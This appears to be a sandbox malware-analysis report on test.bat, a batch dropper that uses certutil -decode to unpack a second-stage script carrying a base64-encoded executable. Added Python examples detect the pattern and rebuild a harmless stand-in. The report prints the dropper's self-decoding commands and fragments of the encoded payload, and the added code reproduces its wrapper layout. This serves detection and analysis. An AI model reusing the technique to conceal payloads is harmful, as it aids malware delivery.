
Windows Analysis Report
test.bat

Overview

General Information

Sample Name:test.bat
Analysis ID:876994
MD5:7e1348c4cc1ddab3b771afb1dd4c9cc2
SHA1:b395aa85edf28a8852ede1d2a59e964584a4fc7f
SHA256:6f308d6ea87ba7a786e0868014d018a928b4cabc4d354d67e8e1d7f3e7eb9cc7
Tags:bat

Detection

Score:1
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Sample execution stops while process was sleeping (likely an evasion)
Creates a process in suspended mode (likely to inject code)
Yara signature match

Note on reading the score: 1/100 (CLEAN) reflects what ran during this analysis, not what the sample carries. test.bat decodes itself with certutil into %Temp%\1.bat and then invokes 1.bat without `call`, so the second stage runs inside the same cmd.exe (PID 7248) and appears as no new process. The decoded 1.bat (see the dropped-file preview further down) only starts "Client-built.exe" and exits; no file of that name is among the dropped files, and the cookbook comments record that not all processes were analysed. The PE that sits base64-encoded inside 1.bat's own certificate block was therefore never executed here. The static evidence (the double-base64 Yara hit on the sample, on a memory dump and on certutil's process space, plus the ReversingLabs Win32.Trojan.Generic label) is what should drive triage.

Classification

  • System is w10x64
  • cmd.exe (PID: 7248 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\test.bat" " MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
    • conhost.exe (PID: 7256 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • mode.com (PID: 7308 cmdline: Mode 60,3 MD5: 1A3D2D975EB4A5AF22768F1E23C9A83C)
    • certutil.exe (PID: 7328 cmdline: CERTUTIL -f -decode "C:\Users\user\Desktop\test.bat" "C:\Users\user\AppData\Local\Temp\1.bat" MD5: EB199893441CED4BBBCB547FE411CF2D)
No configs have been found
Yara matches (source, rule, description, author, matched string):

  • test.bat (sample): SUSP_Double_Base64_Encoded_Executable, "Detects an executable that has been encoded with base64 twice", Florian Roth (Nextron Systems); string $ = "VFZxUUFBT" at 0x158
  • 00000003.00000003.554928918.00000185629B1000.00000004.00000020.00020000.00000000.sdmp (certutil.exe memory dump): same rule; string at 0x198
  • Process Memory Space: certutil.exe PID: 7328: same rule; string at 0x807ea

The string "VFZxUUFBT" is the base64 encoding of the text "TVqQAAM", which is itself the base64 encoding of the start of an MZ (PE) header; that is the "encoded twice" the rule name refers to. It lands on test.bat because the outer certificate block is base64 of 1.bat, and 1.bat in turn carries a base64 certificate block that starts with "TVqQAAMAAAAEAAAA".
No Sigma rule has matched
No Snort rule has matched

There are no malicious signatures; the entries below are informational and suspicious-level results.

Source: test.bat, type: SAMPLE. Matched rule: SUSP_Double_Base64_Encoded_Executable (date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth (Nextron Systems), description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889)
Source: 00000003.00000003.554928918.00000185629B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY. Matched rule: SUSP_Double_Base64_Encoded_Executable (same metadata as above)
Source: Process Memory Space: certutil.exe PID: 7328, type: MEMORYSTR. Matched rule: SUSP_Double_Base64_Encoded_Executable (same metadata as above)
Source: C:\Windows\System32\certutil.exe | File created: C:\Users\user\AppData\Local\Temp\1.bat
Source: unknown | Process created: C:\Windows\System32\cmd.exe  C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\test.bat" "
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7256:120:WilError_01
Source: C:\Windows\System32\mode.com | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: classification engine | Classification label: clean1.winBAT@6/2@0/0
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe  C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\mode.com  Mode 60,3
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\certutil.exe  CERTUTIL -f -decode "C:\Users\user\Desktop\test.bat" "C:\Users\user\AppData\Local\Temp\1.bat"
Source: test.bat | Static file information: File size 6175325 > 1048576
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
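Nothing on this page matched a Sigma rule, yet the process-creation lines above contain the signal a detection engineer would key on: certutil.exe invoked with -decode on a .bat, the output placed under %Temp%, and the input being the very script the parent cmd.exe is running. The Python below is an added example (not a Joe Sandbox signature and not an existing Sigma rule) that encodes those conditions and runs them over constructed process-creation records. The first two records copy the command lines from the process tree above; the other two are invented benign controls. Field names (Image, CommandLine, ParentCommandLine) follow Sysmon Event ID 1 naming, but every record is hand-built.

```python
"""
Detection logic for the certutil -decode pattern seen in this report, run over
constructed process-creation events.

Added example; not a Joe Sandbox signature and not an existing Sigma rule.
EVENTS is hand-built: entries 1-2 copy the command lines from the report's
process tree, entries 3-4 are benign controls. Field names follow the Sysmon
Event ID 1 / Security 4688 vocabulary, but the records are constructed.
"""
import re

DECODE_FLAGS = {"-decode", "-decodehex", "/decode", "/decodehex"}
SCRIPT_EXT = (".bat", ".cmd", ".txt", ".ps1", ".vbs", ".js", ".jse", ".wsf")
RISKY_OUT_EXT = (".exe", ".dll", ".scr", ".bat", ".cmd", ".ps1", ".vbs", ".js")
TEMP_MARKERS = ("\\appdata\\local\\temp\\", "\\windows\\temp\\",
                "\\programdata\\", "\\users\\public\\")
# A drive-letter path ending in .bat/.cmd inside the parent's command line.
BAT_PATH = re.compile(r'([a-z]:\\[^"]+?\.(?:bat|cmd))')


def tokenize(cmdline: str) -> list:
    """Split a Windows command line on whitespace while keeping double-quoted
    arguments whole. Enough for certutil's argument shapes; it is not a full
    CommandLineToArgvW (no escaped quotes)."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def check_certutil(event: dict):
    """Return a finding dict for a suspicious `certutil -decode`, else None."""
    if not event["Image"].lower().endswith("\\certutil.exe"):
        return None
    toks = [t for t in tokenize(event["CommandLine"])[1:] if t]
    flags = {t.lower() for t in toks if t.startswith(("-", "/"))}
    if not flags & DECODE_FLAGS:
        return None
    files = [t for t in toks if not t.startswith(("-", "/"))]
    if len(files) < 2:
        return None                      # -decode takes InFile OutFile
    infile, outfile = files[0].lower(), files[1].lower()

    reasons = []
    if infile.endswith(SCRIPT_EXT):
        reasons.append("input is a script/text file rather than a certificate")
    if outfile.endswith(RISKY_OUT_EXT):
        reasons.append("output is an executable or script")
    if any(m in outfile for m in TEMP_MARKERS):
        reasons.append("output lands in a temp/public directory")
    m = BAT_PATH.search(event.get("ParentCommandLine", "").lower())
    if m and m.group(1) == infile:
        reasons.append("self-decoding batch: input is the parent cmd.exe's own script")
    if not reasons:
        return None
    return {"pid": event["ProcessId"],
            "severity": "high" if len(reasons) >= 2 else "medium",
            "reasons": reasons, "outfile": files[1]}


def scan(events: list) -> list:
    """Findings for every event that trips check_certutil()."""
    return [f for f in map(check_certutil, events) if f is not None]


EVENTS = [
    {   # certutil.exe PID 7328, command lines as in the report's process tree
        "ProcessId": 7328, "Image": r"C:\Windows\System32\certutil.exe",
        "CommandLine": r'CERTUTIL -f -decode "C:\Users\user\Desktop\test.bat" "C:\Users\user\AppData\Local\Temp\1.bat"',
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "ParentCommandLine": r'C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\test.bat" "',
    },
    {   # mode.com PID 7308 from the report: console resize, nothing to flag
        "ProcessId": 7308, "Image": r"C:\Windows\System32\mode.com",
        "CommandLine": "Mode 60,3",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "ParentCommandLine": r'C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\test.bat" "',
    },
    {   # CONSTRUCTED benign control: an admin converting base64 PEM to DER
        "ProcessId": 4120, "Image": r"C:\Windows\System32\certutil.exe",
        "CommandLine": r"certutil -decode C:\certs\web.b64 C:\certs\web.cer",
        "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentCommandLine": "powershell.exe",
    },
    {   # CONSTRUCTED benign control: certutil without any decode switch
        "ProcessId": 4133, "Image": r"C:\Windows\System32\certutil.exe",
        "CommandLine": r"certutil -verify -urlfetch C:\certs\web.cer",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "ParentCommandLine": "cmd.exe",
    },
]

if __name__ == "__main__":
    for finding in scan(EVENTS):
        print(finding["pid"], finding["severity"], "; ".join(finding["reasons"]))
```

The four conditions are independent, so the constructed PEM-to-DER conversion yields no finding while the sample's command line trips all four. In production the self-decoding and temp-output conditions carry most of the weight, because administrators do occasionally run certutil -decode on .txt files. Windows applies more quoting rules (CommandLineToArgvW) than tokenize() handles; feed it the raw CommandLine field rather than a reconstructed one.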
Source: 1.bat.3.drBinary or memory string: ZisBFgsCKDMiAAYtLAJvMCIABgwHCG8nIgAGb5gEAAofEVphCwcIbygiAAZvmAQA
Source: 1.bat.3.drBinary or memory string: MtoRBBEFbzofAAYTBgYRBm8MHwAGWR8wWSUYWxdYCAcoKToABhMHGFsXWAgHKCk6
Source: 1.bat.3.drBinary or memory string: EQ5vxSEABiwXEQ1vxSEABiwHAm9HIgAGKgZvYyEABioIb8UhAAY5pgAAAAJvMCIA
Source: 1.bat.3.drBinary or memory string: IQAGDQkIb0giAAZvMCIABiVvMyIABiwLcpuAA3BzbgIACnpvJSIABm+3IQAGKooD
Source: 1.bat.3.drBinary or memory string: KgZvYyEABioIb8UhAAY5pgAAAAJvMCIABiVvJyIABgtvKCIABhMSEQUTExESERNv
Source: 1.bat.3.drBinary or memory string: KgZvYyEABioIb8UhAAY5oQAAAAJvMCIABiVvJyIABgtvKCIABhMSEQUTExESERNv
Source: 1.bat.3.drBinary or memory string: BhMEAnsjFwAEb4I1AAYEEQQJKDohAAZvMCIABhMFEQVvMyIABiwCFioDCBEFbyUi
Source: 1.bat.3.drBinary or memory string: KgZvYyEABioIb8UhAAY5rAAAAAJvMCIABiVvJyIABgtvKCIABhMSEQUTExESERNv
Source: 1.bat.3.drBinary or memory string: BiwHAm9HIgAGKgZvYyEABioIb8UhAAY5sAAAAAJvMCIABiVvJyIABnTRBAACC28o
Source: 1.bat.3.drBinary or memory string: EQ5vxSEABiwXEQ1vxSEABiwHAm9HIgAGKgZvYyEABioIb8UhAAY5nAAAAAJvMCIA
Source: 1.bat.3.drBinary or memory string: EjEsR2qZrsh/+U9dlm/0szkh2pyFnjvwv+8G7uVfIBDMPFRKUpQOwCj2VmCi4w/s
Source: 1.bat.3.drBinary or memory string: BytECSwLEQZvMCIABhMGKzYGB29uIQAGLQIWKhiNEAQAAiUWAqIlFwYRB29gIQAG
Source: 1.bat.3.drBinary or memory string: tAAAAAJvMCIABiVvJyIABnTRBAACC28oIgAGExYRBRMXERYRF2+6IQAGB2++IQAG
Source: 1.bat.3.drBinary or memory string: KDohAAZvMCIABioAEzAFADUBAAADCAARAntiHgAEb2AtAAYKGgYopwUACo0qAAAB
Source: 1.bat.3.drBinary or memory string: c1wCAAp6AhZzXgUACgoGKC8zAAYLBxgyBQcXXywIHzJz1zEABnoHGFsGKD4zAAYG
Source: 1.bat.3.drBinary or memory string: EzACAFMAAAAAAAAAAy0Qcg/XAnBy69kCcHPVAgAKegIDKDwhAAZvMCIABhABA28z
Source: 1.bat.3.drBinary or memory string: CgoGKC8zAAYLBxgyBQcXXywIHzJz1zEABnoHGFsGKD4zAAYGKDozAAYMBihDMgAG
Source: 1.bat.3.drBinary or memory string: b1EhAAYt0xYqEQVvMCIABm8lIgAGb7chAAYGbyYfAAYEb5cEAAoqABMwAwAoAAAA
Source: 1.bat.3.drBinary or memory string: b9kjAAZvMCIABn1HGAAEAgV9SBgABAIHBm+CNQAGBW+sNQAGb9kjAAZvMCIABn1J
Source: 1.bat.3.drBinary or memory string: xSEABiwHAm9HIgAGKgZvYyEABioIb8UhAAY5nAAAAAJvMCIABiVvJyIABgtvKCIA
MITRE ATT&CK matrix. The report lists two techniques per tactic; the number in parentheses is the report's own marker for techniques its signatures matched, entries without a number are the matrix's default placeholders.

Initial Access: Valid Accounts; Default Accounts
Execution: Scripting (1); Scheduled Task/Job
Persistence: Path Interception; Boot or Logon Initialization Scripts
Privilege Escalation: Process Injection (11); Boot or Logon Initialization Scripts
Defense Evasion: Process Injection (11); Scripting (1)
Credential Access: OS Credential Dumping; LSASS Memory
Discovery: Security Software Discovery (1); System Information Discovery (1)
Lateral Movement: Remote Services; Remote Desktop Protocol
Collection: Data from Local System; Data from Removable Media
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth
Command and Control: Data Obfuscation; Junk Data
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization
Impact: Modify System Partition; Device Lockout

Not represented in the matrix: the certutil -decode step itself, which ATT&CK files under T1140 (Deobfuscate/Decode Files or Information) and which is this sample's central action.
Behavior graph (ID: 876994, sample: test.bat, start date: 28/05/2023, architecture: WINDOWS, score: 1): cmd.exe started conhost.exe, certutil.exe and mode.com.

Antivirus detection (source, detection, scanner, label):
  • test.bat: 3%, ReversingLabs, Win32.Trojan.Generic
  • test.bat: 7%, Virustotal
No Antivirus matches
No contacted domains info
No contacted IP infos
Joe Sandbox Version:37.1.0 Beryl
Analysis ID:876994
Start date and time:2023-05-28 09:32:19 +02:00
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 3m 50s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:4
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample file name:test.bat
Detection:CLEAN
Classification:clean1.winBAT@6/2@0/0
EGA Information:Failed
HDC Information:Failed
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 0
  • Number of non-executed functions: 0
Cookbook Comments:
  • Found application associated with file extension: .bat
  • Stop behavior analysis, all processes terminated
  • Not all processes were analysed; the report is missing behavior information
No simulations
No context
Process:C:\Windows\System32\certutil.exe
File Type:DOS batch file, ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):4490960
Entropy (8bit):5.084469480252474
Encrypted:false
SSDEEP:24576:gUMlU9gRTCyXsYpmM5uXnR4r5ZVeeSZNpE8ybnuSjPJeMMKz1OiPYQ8huXwN9JKG:JKcu6ep4PHAL4jVYC2/ig+
MD5:25978F2599F1B076B115175A8F557392
SHA1:3441D1B82C073217A76826C79A75C85355EECE29
SHA-256:54B229E2CA59E0421FF71D5DF7F344D567A3B77D8472B8F690DDAB0A3839A955
SHA-512:66B4DE8F20456C43244058AAE45FDB9DE9E80F21C450EE233D5F4F149C9EC8AD8F6BEFE870F12829A936EA80A6660D600BDEA87483DA203E4EB3619DC936075B
Malicious:false
Reputation:low
Preview:@echo off..Start "Client-built" "Client-built.exe"..Exit..-----BEGIN CERTIFICATE-----..TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..AAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5v..dCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAOf6DWQAAAAA..AAAAAOAAAgELAQgAAMYxAAAOAAAAAAAA/uMxAAAgAAAAAAAAAABAAAAgAAAAAgAA..BAAAAAAAAAAEAAAAAAAAAABAMgAAAgAAAAAAAAIAQIUAABAAABAAAAAAEAAAEAAA..AAAAABAAAAAAAAAAAAAAALDjMQBLAAAAAAAyAJMKAAAAAAAAAAAAAAAAAAAAAAAA..ACAyAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..AAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAA..BMQxAAAgAAAAxjEAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNyYwAAAJMKAAAAADIA..AAwAAADIMQAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAACAyAAACAAAA1DEA..AAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAADg4zEAAAAAAEgAAAACAAUA..ENYXAKANGgABAAAAAQAABpxrFgBwAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..AAAAAAAAAAAAAAAAAAAAABMwAwBNAAAAAAAAACAADAAAKAEAAAoYKAIAAAoU/gYC..AAAGcwMAAAooBAAACigFAAAKFP4GAwAABnMGAAAKbwcAAAooCAAAChY
Process:C:\Windows\System32\certutil.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):100
Entropy (8bit):4.894177320667445
Encrypted:false
SSDEEP:3:qOYFTUxovF6M+YFRRcTwqRF8jxd1ELzdUA2AGN8cv:q3eWnFcCxILxUANGN8e
MD5:9C411874FFF521EF1CEBAA7F35890C52
SHA1:CB963C0D48F92C6C5D601F68D7D56ECC19411239
SHA-256:FF1208CD7D8DC8A23757389FA46955CDA31B024EF5180D4A5EC854BF319DFBEC
SHA-512:4D7727CE7C0F5383F06F96FFD115EA9AF22A53B14B7C6C6FAC448B18DCF12F915A8C99BAC29580B853A97B0A5DDBA767FB3556453EA290715CF0E3E6B2D5F307
Malicious:false
Preview:Input Length = 6175325..Output Length = 4490960..CertUtil: -decode command completed successfully...
File type:Unicode text, UTF-16, little-endian text, with very long lines (32767), with no line terminators
Entropy (8bit):5.20450028605933
TrID:
  • MP3 audio (ID3 v1.x tag) (2501/1) 45.44%
  • Text - UTF-16 (LE) encoded (2002/1) 36.37%
  • MP3 audio (1001/1) 18.19%
Note: the file-type and TrID guesses are driven by the sample's leading bytes and disagree with the content preview below, which shows a plain CRLF batch script followed by a -----BEGIN CERTIFICATE----- block. certutil accepted the whole file (Input Length = 6175325 in its status output) and decoded the block to 4490960 bytes, so the batch wrapper and the certificate block are what matter, not the text-encoding label.
File name:test.bat
File size:6175325
MD5:7e1348c4cc1ddab3b771afb1dd4c9cc2
SHA1:b395aa85edf28a8852ede1d2a59e964584a4fc7f
SHA256:6f308d6ea87ba7a786e0868014d018a928b4cabc4d354d67e8e1d7f3e7eb9cc7
SHA512:8cd7db51c75e37a3191141632485922d20eecefb16d94aa8629aad3b1951b18e09baa599b5b0c99137262ef34a1fb3414137fcc5ccc5f21e9cf3fa9654a6aa6c
SSDEEP:49152:G4duV2eLoRzGGqGLDw3jF/8ahdU79QVCp4:+
TLSH:DE563C60AF88654DB2881D8BF02E695AB5F32B86C9B3B2CCE343780FB95FD1D3515845
File Content Preview:..&cls..@echo off ..Title %~n0..Mode 60,3 ..color 0B..echo(..echo Please wait... a while Loading data ......CERTUTIL -f -decode "%~f0" "%Temp%\1.bat" >nul 2>&1 ..cls.."%Temp%\1.bat"..Exit..-----BEGIN CERTIFICATE-----..QGVjaG8gb2ZmDQpTdGFydCAiQ2xpZ
Icon Hash:9686878b929a9886
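The Yara matches earlier in the report (string "VFZxUUFBT" at 0x158 in the sample) and the two file previews (test.bat: batch commands ending in a certificate block; the decoded 1.bat: starts Client-built.exe and carries a second certificate block whose base64 begins with an MZ header) describe one mechanism. The Python below is an added example, not Joe Sandbox code and not the Yara rule author's code. It builds a constructed stand-in with the same layout (the embedded "PE" is a 32-byte MZ stub, not the real payload), unwraps it stage by stage the way certutil -decode would, and shows where the double-base64 marker comes from.

```python
"""
Stage-by-stage unwrap of a certutil-wrapped batch dropper laid out like the
sample and dropped-file previews in this report, plus the reason the Yara
string "VFZxUUFBT" (SUSP_Double_Base64_Encoded_Executable) fires on it.

Added example for this report; not Joe Sandbox code and not the Yara rule
author's code. build_sample() is CONSTRUCTED: it copies the wrapper layout
seen in the previews (batch commands, then a -----BEGIN CERTIFICATE----- block
that `certutil -decode` turns into the next stage), with a 32-byte MZ stub in
place of the real payload.
"""
import base64
import re

YARA_STRING = "VFZxUUFBT"   # the $ string of SUSP_Double_Base64_Encoded_Executable

CERT_BLOCK = re.compile(
    r"-----BEGIN CERTIFICATE-----\r?\n(.*?)-----END CERTIFICATE-----", re.S
)


def encode_cert_block(data: bytes) -> str:
    """Lay data out the way `certutil -encode` does: base64 in 64-char lines
    between BEGIN/END CERTIFICATE headers, CRLF line ends."""
    b64 = base64.b64encode(data).decode()
    lines = [b64[i:i + 64] for i in range(0, len(b64), 64)]
    return ("-----BEGIN CERTIFICATE-----\r\n" + "\r\n".join(lines)
            + "\r\n-----END CERTIFICATE-----\r\n")


def decode_cert_block(text: str) -> bytes:
    """What `certutil -decode` does with such a file: everything before the
    BEGIN line (here the batch commands) is skipped and the body is decoded."""
    m = CERT_BLOCK.search(text)
    if m is None:
        raise ValueError("no -----BEGIN CERTIFICATE----- block")
    return base64.b64decode(re.sub(r"\s+", "", m.group(1)), validate=True)


def unwrap_stages(blob: bytes, max_depth: int = 5) -> list:
    """Return [stage0, stage1, ...]; each stage is the decoded certificate
    block of the previous one. Stops at a PE image (MZ) or when a stage
    carries no further block."""
    stages = [blob]
    while len(stages) <= max_depth and not stages[-1].startswith(b"MZ"):
        try:
            stages.append(decode_cert_block(stages[-1].decode("latin-1")))
        except ValueError:
            break
    return stages


def double_b64_marker(prefix: bytes = b"MZ\x90\x00\x03\x00\x00\x00") -> str:
    """base64(base64(prefix)): an MZ header encoded once reads 'TVqQAAM...';
    encoding that text again reads 'VFZxUUFBT...', which the rule keys on."""
    return base64.b64encode(base64.b64encode(prefix)).decode()


def find_marker(blob: bytes) -> int:
    """Offset of the Yara string in the outer file (-1 if absent). It only
    appears when the inner 'TVqQ' text starts on a 3-byte boundary of the
    inner stage, which the wrapper in build_sample() happens to satisfy."""
    return blob.find(YARA_STRING.encode())


def build_sample() -> bytes:
    # CONSTRUCTED stand-in for the PE: only the MZ header bytes are realistic.
    fake_pe = b"MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00" + b"\x00" * 16
    # Stage 2 batch, shaped like the 1.bat preview: start the payload, exit.
    stage1 = ("@echo off\r\nStart \"Client-built\" \"Client-built.exe\"\r\nExit\r\n"
              + encode_cert_block(fake_pe)).encode()
    # Stage 1 batch, shaped like the test.bat preview: decode self into %Temp%.
    wrapper = ("@echo off\r\nTitle %~n0\r\nMode 60,3\r\n"
               "CERTUTIL -f -decode \"%~f0\" \"%Temp%\\1.bat\" >nul 2>&1\r\n"
               "cls\r\n\"%Temp%\\1.bat\"\r\nExit\r\n")
    return (wrapper + encode_cert_block(stage1)).encode()


if __name__ == "__main__":
    sample = build_sample()
    for i, stage in enumerate(unwrap_stages(sample)):
        print(f"stage {i}: {len(stage)} bytes, starts {stage[:12]!r}")
    print("Yara string offset in outer file:", hex(find_marker(sample)))
```

Running the script yields three stages (wrapper, second-stage batch, MZ stub) and a positive offset for the marker, the same shape the report shows for the real file. The alignment remark in find_marker() is the practical caveat: a wrapper whose inner header length is not a multiple of 3 shifts the base64 phase and the 9-character string no longer appears verbatim, which is why the rule's memory hits (on certutil's decoded output) are more robust than the hit on the outer sample.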
No network behavior found

Target ID:0
Start time:09:33:20
Start date:28/05/2023
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\test.bat" "
Imagebase:0x7ff632260000
File size:273920 bytes
MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

Target ID:1
Start time:09:33:20
Start date:28/05/2023
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7c72c0000
File size:625664 bytes
MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

Target ID:2
Start time:09:33:21
Start date:28/05/2023
Path:C:\Windows\System32\mode.com
Wow64 process (32bit):false
Commandline:Mode 60,3
Imagebase:0x7ff7ae380000
File size:31232 bytes
MD5 hash:1A3D2D975EB4A5AF22768F1E23C9A83C
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate

Target ID:3
Start time:09:33:21
Start date:28/05/2023
Path:C:\Windows\System32\certutil.exe
Wow64 process (32bit):false
Commandline:CERTUTIL -f -decode "C:\Users\user\Desktop\test.bat" "C:\Users\user\AppData\Local\Temp\1.bat"
Imagebase:0x7ff6f6a00000
File size:1557504 bytes
MD5 hash:EB199893441CED4BBBCB547FE411CF2D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
  • Rule: SUSP_Double_Base64_Encoded_Executable, Description: Detects an executable that has been encoded with base64 twice, Source: 00000003.00000003.554928918.00000185629B1000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
Reputation:moderate

No disassembly